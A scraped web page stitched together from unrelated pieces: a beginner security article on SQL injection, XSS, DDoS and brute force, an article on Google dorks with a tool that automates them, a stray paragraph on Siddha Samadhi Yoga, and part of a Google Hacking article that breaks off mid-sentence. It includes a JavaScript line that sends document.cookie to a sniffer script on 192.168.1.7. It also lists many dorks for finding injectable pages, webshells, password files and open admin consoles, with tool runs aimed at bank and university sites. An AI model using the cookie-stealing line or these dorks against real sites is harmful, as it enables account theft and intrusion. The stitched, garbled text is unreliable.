Inurl php month what earnings. Instructions for using jSQL Injection, a multifunctional tool for finding and exploiting SQL injections in Kali Linux. Getting the version of the WEB server

I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

Many novice developers are so addicted to writing code that they completely forget about the security of their work. And most importantly, they forget about such vulnerabilities as SQL query, XXS. They also come up with easy passwords for their administrative panels and are subjected to brute force. What are these attacks and how can they be avoided?

SQL injection

SQL injection is the most common type of database attack that is carried out with a SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer's mistake when writing a database and, in fact, SQL queries.

An SQL injection type attack is possible due to incorrect processing of input data used in SQL queries. With a successful attack by a hacker, you run the risk of losing not only the contents of the databases, but also the passwords and logs of the administrative panel, respectively. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on which DBMS is used and how the scenario itself is implemented. There are a lot of vulnerable sites for SQL injections in the world. This is easy to verify. It is enough to enter "dorks" - these are special requests for finding vulnerable sites. Here are some of them:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

How to use them? It is enough to enter them into the Google or Yandex search engine. The search engine will give you not just a vulnerable site, but also a page for this vulnerability. But we will not stop there and make sure that the page is really vulnerable. For this, it is enough to put a single quote “‘” after the value “id=1”. Something like this:

inurl:games.php?id=1'

And the site will give us an error about SQL query. What does our hacker need next?

And then he needs this very link to the page with an error. Then work on the vulnerability in most cases takes place in the distribution kit "Kali linux" with its utilities for this part: the introduction of the injection code and the performance of the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

XSS Attack

This type of attack is carried out on cookies. They, in turn, are very fond of saving users. Why not? How without them? After all, thanks to Cookies, we do not drive in a password from Vk.com or Mail.ru a hundred times. And there are few who refuse them. But on the Internet, a rule often appears for hackers: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To implement an XSS attack, our hacker needs JavaScript knowledge. The language at first glance is very simple and harmless, because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.

I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.

A hacker can add JS code to some forum or guestbook:

Scripts redirect us to an infected page where the code will be executed: be it a sniffer, some kind of storage, or an exploit that will somehow steal our Cookies from the cache.

Why JavaScript? Because JavaScript is great with web requests and has access to cookies. But if our script will transfer us to some site, then the user will easily notice this. Here, the hacker uses a more cunning option - he simply enters the code into the picture.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

We simply create an image and assign our script to it as an address.

How to protect yourself from all this? Very simple - do not follow suspicious links.

DoS and DDos Attacks

DoS (from the English Denial of Service - denial of service is a hacker attack on a computer system with the aim of bringing it to failure. This is the creation of such conditions under which conscientious users of the system cannot access the provided system resources (servers), or this access is difficult. The failure of the system can also be a step towards its capture if, in an emergency, the software gives out any critical information: for example, the version, part of the program code, etc. But most often it is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid the attack significantly hit the "target" in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow you to bring almost any system to failure without leaving legally significant evidence.

What is the difference between DoS and DDos attacks?

DoS is an attack built in a smart way. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request that will be processed forever, and there will not be enough processor time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can easily cope with such an overload.

DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there may very well be hundreds or more of them. Even heavy-duty servers may not be able to cope with such an overload. I'll give you an example.

A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts screaming loudly. Talking is either impossible or very difficult. Solution: call security, which will calm and take the person out of the room. DDoS attacks are when thousands of such ill-mannered people run in. In this case, the guards will not be able to twist and take everyone away.

DoS and DDoS are produced from computers, the so-called zombies. These are computers of users hacked by hackers who do not even suspect that their machine is involved in the attack of any server.

How to protect yourself from this? In general, no way. But you can complicate the task of a hacker. To do this, you need to choose a good hosting with powerful servers.

Brute force attack

A developer can come up with a lot of attack protection systems, fully review the scripts we have written, check the site for vulnerabilities, etc. But when it comes to the last step of the site layout, namely when it will just put a password on the admin panel, he can forget about one thing. Password!

It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and not complex attack - Brute Force.

Brute force is a dictionary-based password brute-force attack using special programs. Dictionaries can be different: Latin, sorting by numbers, let's say up to some range, mixed (Latin + numbers), and there are even dictionaries with unique symbols @#4$%&*~~`'”\ ? etc.

Of course, this type of attack is easy to avoid. It is enough to come up with a complex password. Even captcha can save you. And also, if your site is made on CMS, then many of them calculate a similar type of attack and block ip. We must always remember that the more different characters in the password, the harder it is to pick it up.

How do hackers work? In most cases, they either suspect or already know part of the password. It is quite logical to assume that the user's password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacks. Basically, hackers take a range of 5 to 10 characters and add a few characters there that they probably know in advance. Next, generate passwords with the desired ranges. The Kali linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, while the enumeration speed increases by as much as 10 times. And now we see that an attack in such a simple way is quite real. But not only sites are subjected to brute force.

Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always be distracted somewhere or overlook somewhere. We are programmers, but not programmed machines. Be always on the alert, because the loss of information threatens with serious consequences!

Any search for vulnerabilities on web resources begins with reconnaissance and information gathering.
Intelligence can be either active - brute force of files and directories of the site, launching vulnerability scanners, manually viewing the site, or passive - searching for information in different search engines. Sometimes it happens that a vulnerability becomes known even before the opening of the first page of the site.

How is this possible?
Search robots, constantly roaming the Internet, in addition to information useful to an ordinary user, often fix what can be used by attackers when attacking a web resource. For example, script errors and files with sensitive information (from configuration files and logs to files with authentication data and database backups).
From the point of view of a search robot, an sql query execution error message is a plain text, inseparable, for example, from the description of the goods on the page. If suddenly a search robot stumbles upon a file with the .sql extension, which for some reason ended up in the working folder of the site, then it will be perceived as part of the site's content and will also be indexed (including, possibly, the passwords specified in it).

Such information can be found by knowing strong, often unique, keywords that help separate "vulnerable pages" from pages that do not contain vulnerabilities.
A huge database of special queries using keywords (so-called dorks) exists at exploit-db.com and is known as the Google Hack Database.

Why google?
Dorks are targeted primarily at google for two reasons:
− the most flexible syntax for keywords (given in Table 1) and special characters (given in Table 2);
- the google index is still more complete than that of other search engines;

Table 1 - Key google keywords

Keyword	Meaning	Example
site	Search only on the specified site. Considers only url	site:somesite.ru - finds all pages on the given domain and subdomains
inurl	Search by words present in uri. Unlike cl. words “site”, searches for matches after the site name	inurl:news - finds all pages where the given word occurs in the uri
intext	Search in the body of the page	intext:"traffic" - completely similar to the usual query "traffic"
title	Search in the title of the page. Text between tags <br></td> <td width="214">intitle:”index of” - finds all pages with a directory listing <br></td> </tr><tr><td width="214">ext <br></td> <td width="214">Search for pages with the specified extension <br></td> <td width="214">ext:pdf - finds all pdf files <br></td> </tr><tr><td width="214">filetype <br></td> <td width="214">At present, it is completely analogous to class. the word "ext" <br></td> <td width="214">filetype:pdf - similar <br></td> </tr><tr><td width="214">related <br></td> <td width="214">Search for sites with similar topics <br></td> <td width="214">related:google.ru - will show its analogues <br></td> </tr><tr><td width="214">link <br></td> <td width="214">Search for sites that link to this <br></td> <td width="214">link:somesite.ru - finds all sites that have a link to this <br></td> </tr><tr><td width="214">define <br></td> <td width="214">Show word definition <br></td> <td width="214">define:0day - definition of the term <br></td> </tr><tr><td width="214">cache <br></td> <td width="214">Show cached page content (if available) <br></td> <td width="214">cache:google.com - open page from cache <br></td> </tr></tbody></table><p>Table 2 - Google Query Special Characters <br></p><table><tbody><tr><td width="214"><b>Symbol</b><br></td> <td width="214"><b>Meaning</b><br></td> <td width="214"><b>Example</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Exact Phrase <br></td> <td width="214">intitle:"RouterOS router configuration page" - search for routers <br></td> </tr><tr><td width="214"><br></td> <td width="214">Any text <br></td> <td width="214">inurl:"bitrixmcart" - search for sites on bitrix with a vulnerable mcart module <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Any character <br></td> <td width="214">Index.of - similar to the index of query <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Delete word <br></td> <td width="214">error -warning - show all pages with error but no warning <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Range <br></td> <td width="214">cve 2006..2016 - show vulnerabilities by year starting from 2006 <br></td> </tr><tr><td width="214">\|<br></td> <td width="214">Logical "or" <br></td> <td width="214">linux \| windows - show pages where either the first or second word occurs <br></td> </tr></tbody></table><br>It should be understood that any request to a search engine is a search only by words. <br>It is useless to look for meta-characters on the page (quotes, brackets, punctuation marks, etc.). Even searching for an exact phrase in quotation marks is a word search, followed by an exact match already in the results. <p>All Google Hack Database dorks are logically divided into 14 categories and are presented in Table 3. <br>Table 3 - Google Hack Database Categories <br></p><table><tbody><tr><td width="168"><b>Category</b><br></td> <td width="190"><b>What makes it possible to find</b><br></td> <td width="284"><b>Example</b><br></td> </tr><tr><td width="168">footholds <br></td> <td width="190">Web shells, public file managers <br></td> <td width="284">Find all hacked sites containing the listed webshells: <br>(intitle:"phpshell" OR intitle:"c99shell" OR intitle:"r57shell" OR intitle:"PHP Shell" OR intitle:"phpRemoteView") `rwx` "uname" <br></td> </tr><tr><td width="168">Files containing usernames <br></td> <td width="190">Registry files, configuration files, logs, files containing the history of entered commands <br></td> <td width="284">Find all registry files containing account information: <br><i>filetype:reg reg +intext:"internet account manager"</i><br></td> </tr><tr><td width="168">Sensitive Directories <br></td> <td width="190">Directories with various information (personal documents, vpn configs, hidden repositories, etc.) <br></td> <td width="284">Find all directory listings containing files related to vpn: <br><i>"Config" intitle:"Index of" intext:vpn</i><br>Sites containing git repositories: <br><i>(intext:"index of /.git") ("parent directory")</i><br></td> </tr><tr><td width="168">Web Server Detection <br></td> <td width="190">Version and other information about the web server <br></td> <td width="284">Find the administrative consoles of the JBoss server: <br><i>inurl:"/web-console/" intitle:"Administration Console"</i><br></td> </tr><tr><td width="168">Vulnerable Files <br></td> <td width="190">Scripts containing known vulnerabilities <br></td> <td width="284">Find sites that use a script that allows you to upload an arbitrary file from the server: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Vulnerable Servers <br></td> <td width="190">Installation scripts, web shells, open administrative consoles, etc. <br></td> <td width="284">Find open PHPMyAdmin consoles run as root: <br><i>intitle:phpMyAdmin "Welcome to phpMyAdmin **" "running on as root@"</i><br></td> </tr><tr><td width="168">error messages <br></td> <td width="190">Various errors and warnings often reveal important information - ranging from CMS version to passwords <br></td> <td width="284">Sites with errors in executing sql queries to the database: <br><i>"Warning: mysql_query()" "invalid query"</i><br></td> </tr><tr><td width="168">Files containing juicy info <br></td> <td width="190">Certificates, backups, emails, logs, sql scripts, etc. <br></td> <td width="284">Find initialization sql scripts: <br><i>filetype:sql and "insert into" -site:github.com</i><br></td> </tr><tr><td width="168">Files containing passwords <br></td> <td width="190">Everything that can contain passwords - logs, sql scripts, etc. <br></td> <td width="284">Logs mentioning passwords: <br><i>filetype:</i><i>log</i><i>intext:</i><i>password \|</i><i>pass \|</i><i>pw</i><br>sql scripts containing passwords: <br><i>ext:</i><i>sql</i><i>intext:</i><i>username</i><i>intext:</i><i>password</i><br></td> </tr><tr><td width="168">Sensitive Online Shopping Info <br></td> <td width="190">Information related to online shopping <br></td> <td width="284">Find pincodes: <br><i>dcid=</i><i>bn=</i><i>pin</i><i>code=</i><br></td> </tr><tr><td width="168">Network or vulnerability data <br></td> <td width="190">Information that is not directly related to the web resource, but affects the network or other non-web services <br></td> <td width="284">Find automatic proxy configuration scripts containing information about the internal network: <br><i>inurl:proxy \| inurl:wpad ext:pac \| ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Pages containing portals <br></td> <td width="190">Pages containing login forms <br></td> <td width="284">saplogon webpages: <br><i>intext:"2016 SAP AG. All rights reserved.” intitle:"login"</i><br></td> </tr><tr><td width="168">Various Online Devices <br></td> <td width="190">Printers, routers, monitoring systems, etc. <br></td> <td width="284">Find the printer configuration panel: <br><i>title:"</i><i>hp</i><i>laserjet"</i><i>inurl:</i><i>SSI/</i><i>Auth/</i><i>set_</i><i>config_</i><i>deviceinfo.</i><i>htm</i><br></td> </tr><tr><td width="168">Advisories and Vulnerabilities <br></td> <td width="190">Sites on vulnerable versions of CMS <br></td> <td width="284">Find vulnerable plugins through which you can upload an arbitrary file to the server: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Dorks are more often focused on searching all sites on the Internet. But nothing prevents you from limiting the search area on any site or sites. <br>Each request to google can be focused on a specific site by adding the keyword "site:somesite.com" to the request. This keyword can be appended to any dork. <p><b>Vulnerability Search Automation</b><br>So the idea was born to write a simple utility that automates the search for vulnerabilities using a search engine (google) and based on the Google Hack Database.</p><p>The utility is a script written in nodejs using phantomjs. To be precise, the script is interpreted by phantomjs itself. <br>Phantomjs is a full-fledged web browser without a graphical interface, driven by js code and with a convenient API. <br>The utility received a quite understandable name - dorks. By running it on the command line (without options), we get a short help with several examples of use: <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Figure 1 - List of basic dorks options</p><p>The general syntax of the utility is: dork "command" "list of options". <br>A detailed description of all options is presented in Table 4.</p><p>Table 4 - Syntax dorks <br></p><table border="1"><tbody><tr><td width="214"><b>Command</b><br></td> <td width="214"><b>Option</b><br></td> <td width="214"><b>Description</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-l <br></td> <td width="214">Display numbered list of dork categories Google Hack Database <br></td> </tr><tr><td width="214">-c "category number or name" <br></td> <td width="214">Download dorks of the specified category by number or name <br></td> </tr><tr><td width="214">-q "phrase" <br></td> <td width="214">Download dorks found on request <br></td> </tr><tr><td width="214">-o "file" <br></td> <td width="214">Save result to file (only with -c\|-q options) <br></td> </tr><tr><td rowspan="8" width="214">google <br></td> <td width="214">-d "dork" <br></td> <td width="214">Specify arbitrary dork (option can be used many times, combination with -D option is allowed) <br></td> </tr><tr><td width="214">-D "file" <br></td> <td width="214">Use dorks from a file <br></td> </tr><tr><td width="214">-s "site" <br></td> <td width="214">Set site (option can be used multiple times, combination with -S option is allowed) <br></td> </tr><tr><td width="214">-S "file" <br></td> <td width="214">Use sites from a file (dorks will be searched for each site independently) <br></td> </tr><tr><td width="214">-f "filter" <br></td> <td width="214">Set additional keywords (will be added to each dork) <br></td> </tr><tr><td width="214">-t "number of ms" <br></td> <td width="214">Interval between requests to google <br></td> </tr><tr><td width="214">-T "number of ms" <br></td> <td width="214">Timeout if captcha encountered <br></td> </tr><tr><td width="214">-o "file" <br></td> <td width="214">Save the result to a file (only those dorks for which something was found will be saved) <br></td> </tr></tbody></table><br>Using the ghdb command, you can get all the dorks from exploit-db on an arbitrary request, or specify the entire category. If you specify category 0, then the entire database will be unloaded (about 4.5 thousand dorks). <p>The list of categories currently available is shown in Figure 2. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Figure 2 - List of available categories of GHDB dorks</p><p>The google team will substitute each dork into the google search engine and analyze the result for matches. Dorks for which something was found will be saved to a file. <br>The utility supports different search modes: <br>1 dork and 1 site; <br>1 dork and many sites; <br>1 site and many dorks; <br>many sites and many dorks; <br>The list of dorks and sites can be specified both through an argument and through a file.</p><p><b>Demonstration of work</b><br>Let's try to look for any vulnerabilities using the example of searching for error messages. The command: dorks ghdb –c 7 –o errors.dorks will load all known dorks of the “Error Messages” category as shown in Figure 3. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Figure 3 - Loading all known dorks of the “Error Messages” category</p><p>Dorks loaded and saved to a file. Now it remains to "set" them on some site (see Figure 4). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Figure 4 - Search for vulnerabilities of the site of interest in the google cache</p><p>After some time, several pages containing errors are found on the site under study (see Figure 5).</p><p><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Figure 5 - Found error messages</p><p>As a result, in the result.txt file we get the complete list of dorks that lead to the error. <br>Figure 6 shows the result of searching for site errors. <br><br>Figure 6 - The result of the search for errors</p><p>In the cache for this dork, a full backtrace is displayed, revealing the absolute paths of the scripts, the content management system of the site, and the type of database (see Figure 7). <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Figure 7 - disclosure of information about the site structure</p><p>However, it should be borne in mind that not all dorks from GHDB give a true result. Also, google may not find an exact match and show a similar result.</p><p>In this case, it is wiser to use your personal list of dorks. For example, it is always worth looking for files with “unusual” extensions, examples of which are shown in Figure 8. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Figure 8 - List of file extensions that are not typical for a regular web resource</p><p>As a result, at the command dorks google -D extensions.txt -f bank, from the very first request, google starts returning sites with "unusual" file extensions (see Figure 9). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Figure 9 - Search for "bad" file types on banking sites</p><p>Keep in mind that Google does not accept requests longer than 32 words.</p><p>With dorks google –d intext:”error\|warning\|notice\|syntax” –f university <br>You can look for PHP interpreter errors on educational sites (see Figure 10). <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Figure 10 - Finding PHP Runtime Errors</p><p>Sometimes it is not convenient to use one or two categories of dorks. <br>For example, if you know that the site is running on the wordpress engine, then you need dorks specifically for wordpress. In this case, it is convenient to use the Google Hack Database search. dorks ghdb –q wordpress –o wordpress_dorks.txt will download all wordpress dorks, as shown in Figure 11: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Figure 11 - Search for dorks related to Wordpress</p><p>Let's go back to banks again and with the command dorks google -D wordpress_dords.txt -f bank we will try to find something interesting related to wordpress (see Figure 12). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Figure 12 - Searching for Wordpress vulnerabilities</p><p>It is worth noting that Google Hack Database search does not accept words shorter than 4 characters. For example, if the site's CMS is not known, but the language is known - PHP. In this case, you can filter what you need manually using the pipe and the dorks system search utility –c all \| findstr /I php > php_dorks.txt (see Figure 13): <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Figure 13 - Search through all dorks where there is a mention of PHP</p><p>Searching for vulnerabilities or some sensitive information in a search engine should be searched only if there is a significant index on this site. For example, if a site has 10-15 pages indexed, then it is stupid to search for something in this way. Checking the index size is easy - just enter "site:somesite.com" into the google search bar. An example of a site with an insufficient index is shown in Figure 14. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Figure 14 - Checking the site index size</p><p>Now about the unpleasant... From time to time, google may request a captcha - there's nothing to be done - it will have to be entered. For example, when sorting through the “Error Messages” category (90 dorks), the captcha fell out only once.</p><p>It is worth adding that phantomjs also supports work through a proxy, both through http and through the socks interface. To enable proxy mode, uncomment the corresponding line in dorks.bat or dorks.sh.</p><p>The tool is available as source code</p> <p><b>SSY</b> stands for <b>Siddha Samadhi Yoga</b>(often expanded as ‘Science of Silence Yoga’) where <b>Siddha</b> means ‘something (i.e., knowledge) that is proven or accomplished’, <b>Samadhi</b> means ‘a state in which the intellect is equal’ and <b>Yoga</b> means ‘union with one’s higher self’.</p> <p>SSY is the fundamental knowledge of life. Our ancient rishis had formulated a unique mode of training called Brahmopadesam, which is an instruction on the science of non-doing and experiencing stillness within and abundance without. It brings about a sea change in one’s outlook towards life and effects remarkable maturity in the individual. SSY is nothing but the present-day version of this ancient science of Brahmopadesam.</p> <p>SSY as a training program is offered by</span><b>Life Yessence Academy (LiYA)</b><span>, and it is the flagship program of the institution. Being the flagship programme, it has become synonymous with the name of the organization. Trainings of this great knowledge are taught in many places in the world by teachers of LiYA. The Indian chapter of LiYA is called</span><b>Rishi Samskruti Vidya Kendra (RSVK)</b>). <br></p> <p><i><b><span>“I am the Body” is the first notion that kills the awakening. SSY is the process <br>To enter into Samadhi, the state of total detachment.</span>" </b> </i> </span><i><b><span>-Guruji</b> </i> </p> <p><i>search engine <a href="https://unitarmy.ru/en/bezopasnost/google-poiskovaya-sistema-vse-sekrety-poiska-v-google-naid-tsya.html">Google system</a>(www.google.com) provides many search options. All of these features are an invaluable search tool for a first-time Internet user and at the same time an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers, but also non-computer criminals and even terrorists. <br><b>(9475 views in 1 week)</b> </i></p> <p>Denis Batrankov <br>denisNOSPAMixi.ru</p> <p><b>Attention:</b><i>This article is not a guide to action. This article is written for you, WEB server administrators, so that you will lose the false feeling that you are safe, and you will finally understand the insidiousness of this method of obtaining information and set about protecting your site.</i></p> <h2>Introduction</h2> <p>For example, I found 1670 pages in 0.14 seconds!</p> <p><b>2. </b> Let's enter another line, for example:</p> <b> <a target="_blank" href="http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=inurl:%22auth_user_file.txt%22">inurl:"auth_user_file.txt"</a> </b> <p>a little less, but this is already enough for free download and for guessing passwords (using the same John The Ripper). Below I will give some more examples.</p> <p>So, you need to realize that the Google search engine has visited most of the Internet sites and cached the information contained on them. This cached information allows you to get information about the site and the content of the site without a direct connection to the site, just digging into the information that is stored internally by Google. Moreover, if the information on the site is no longer available, then the information in the cache may still be preserved. All it takes for this method is to know some Google keywords. This technique is called Google Hacking.</p> <p>For the first time, information about Google Hacking appeared on the Bugtruck mailing list 3 years ago. In 2001, this topic was raised by a French student. Here is a link to this letter http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html . It gives the first examples of such requests:</p> <p><b>1) Index of /admin <br>2) Index of /password <br>3) Index of /mail <br>4) Index of / +banques +filetype:xls (for france...) <br>5) Index of / +passwd <br>6) Index of/password.txt</b></p> <p>This topic made a lot of noise in the English-reading part of the Internet quite recently: after an article by Johnny Long published on May 7, 2004. For a more complete study of Google Hacking, I advise you to go to the site of this author http://johnny.ihackstuff.com. In this article, I just want to bring you up to date.</p> <p>Who can use it: <br>- Journalists, spies and all those people who like to stick their nose in other people's business can use this to search for compromising evidence. <br>- Hackers looking for suitable targets for hacking.</p> <h2>How Google works.</h2> <p>To continue the conversation, let me remind you of some of the keywords used in Google queries.</p> <p><b>Search using the + sign</b></p> <p>Google excludes unimportant, in its opinion, words from the search. For example, interrogative words, prepositions and articles in English: for example are, of, where. In Russian, Google seems to consider all words important. If the word is excluded from the search, then Google writes about it. In order for Google to start searching for pages with these words, you need to add a + sign before them without a space before the word. For example:</p> <p><b>ace + of base</b></p> <p><b>Search by sign -</b></p> <p>If Google finds a large number of pages from which you want to exclude pages with certain topics, then you can force Google to look only for pages that do not contain certain words. To do this, you need to indicate these words by putting a sign in front of each - without a space before the word. For example:</p> <p><b>fishing - vodka</b></p> <p><b>Search with the ~ sign</b></p> <p>You may want to look up not only the specified word, but also its synonyms. To do this, precede the word with the symbol ~.</p> <p><b>Finding an exact phrase using double quotes</b></p> <p>Google searches on each page for all occurrences of the words that you wrote in the query string, and it does not care about the relative position of the words, the main thing is that all the specified words are on the page at the same time (this is the default action). To find the exact phrase, you need to put it in quotation marks. For example:</p> <p><b>"bookend"</b></p> <p>To have at least one of the specified words, you must specify the logical operation explicitly: OR. For example:</p> <p><b>book safety OR protection</b></p> <p>In addition, you can use the sign in the search string to denote any word and. to represent any character.</p> <p><b>Finding words with additional operators</b></p> <p>There are search operators that are specified in the search string in the format:</p> <p><b>operator:search_term</b></p> <p>The spaces next to the colon are not needed. If you insert a space after a colon, you will see an error message, and before it, Google will use them as a normal search string. <br>There are groups of additional search operators: languages - indicate in which language you want to see the result, date - limit the results for the past three, six or 12 months, occurrences - indicate where in the document you need to look for the string: everywhere, in the title, in the URL, domains - search the specified site or vice versa exclude it from the search, safe search - block sites containing the specified type of information and remove them from the search results pages. <br>However, some operators do not need an additional parameter, for example, the query " <b>cache:www.google.com</b>" can be called as a full search string, and some keywords, on the contrary, require a search word, for example " <b>site:www.google.com help</b>". In the light of our topic, let's look at the following operators:</p> <table border="1" cellpadding="0" cellspacing="0"><tr><td valign="top"><p><b>Operator</b></p> </td> <td valign="top"><p><b>Description</b></p> </td> <td valign="top"><p><b>Requires an additional parameter?</b></p> </td> </tr><tr><td valign="top"> </td> <td valign="top"><p>search only for the site specified in search_term</p> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"><p>search only in documents with type search_term</p> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"><p>find pages containing search_term in title</p> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"><p>find pages containing all the words search_term in the title</p> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"><p>find pages containing the word search_term in their address</p> </td> <td valign="top"> </td> </tr><tr><td valign="top"> </td> <td valign="top"><p>find pages containing all the words search_term in their address</p> </td> <td valign="top"> </td> </tr></table><p>Operator <b>site:</b> limits the search to only the specified site, and you can specify not only <a href="https://unitarmy.ru/en/windows/chto-takoe-domennoe-imya-i-instrukciya-po-ego-sozdaniyu-kak.html">Domain name</a> but also the IP address. For example, enter:</p> <p>Operator <b>filetype:</b> restricts searches to files of a certain type. For example:</p> <p>As of the date of this article, Google can search within 13 different file formats:</p> <ul><li>Adobe Portable Document Format (pdf)</li> <li>Adobe PostScript (ps)</li> <li>Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)</li> <li>Lotus Word Pro (lwp)</li> <li>MacWrite(mw)</li> <li>Microsoft Excel (xls)</li> <li>Microsoft PowerPoint (ppt)</li> <li>Microsoft Word (doc)</li> <li>Microsoft Works (wks, wps, wdb)</li> <li>Microsoft Write (wri)</li> <li>Rich Text Format (rtf)</li> <li>Shockwave Flash (swf)</li> <li>Text (ans, txt)</li> </ul><p>Operator <b>link:</b> shows all pages that point to the specified page. <br>It must always be interesting to see how many places on the Internet know about you. We try:</p> <p>Operator <b>cache:</b> shows the Google cached version of the site as it looked when Google last visited the page. We take any frequently changing site and look:</p> <p>Operator <b>title:</b> searches for the specified word in the page title. Operator <b>allintitle:</b> is an extension - it looks for all the specified few words in the page title. Compare:</p> <p><b>intitle:flight to mars <br>intitle:flight intitle:on intitle:mars <br>allintitle:flight to mars</b></p> <p>Operator <b>inurl:</b> causes Google to show all pages containing the specified string in the URL. allinurl: searches for all words in a URL. For example:</p> <p><b>allinurl:acid_stat_alerts.php</b></p> <p>This command is especially useful for those who don't have SNORT - at least they can see how it works on a real system.</p> <h2>Google Hacking Methods</h2> <p>So, we found out that, using a combination of the above operators and keywords, anyone can collect the necessary information and search for vulnerabilities. These techniques are often referred to as Google Hacking.</p> <h3>map of site</h3> <p>You can use the site: statement to see all the links that Google has found on the site. Usually, pages that are dynamically created by scripts are not indexed using parameters, so some sites use ISAPI filters so that links are not in the form <b>/article.asp?num=10&dst=5</b>, but with slashes <b>/article/abc/num/10/dst/5</b>. This is done to ensure that the site is generally indexed by search engines.</p> <p>Let's try:</p> <p><b>site:www.whitehouse.gov whitehouse</b></p> <p>Google thinks that every page on a site contains the word whitehouse. This is what we use to get all the pages. <br>There is also a simplified version:</p> <p><b>site:whitehouse.gov</b></p> <p>And the best part is that the comrades from whitehouse.gov didn't even know that we looked at the structure of their site and even looked into the cached pages that Google downloaded for itself. This can be used to study the structure of sites and view content without being noticed for the time being.</p> <h3>Listing files in directories</h3> <p>WEB servers can show lists of server directories instead of the usual <a href="https://unitarmy.ru/en/zvuk-i-karty/formaty-izobrazhenii-dlya-veb-ispolzovaniya-konspekt-uroka-na-temu.html">HTML pages</a>. This is usually done to force users to select and download specific files. However, in many cases administrators have no intention of showing the contents of a directory. This is due to a misconfiguration of the server or the absence of a master page in the directory. As a result, the hacker has a chance to find something interesting in the directory and use 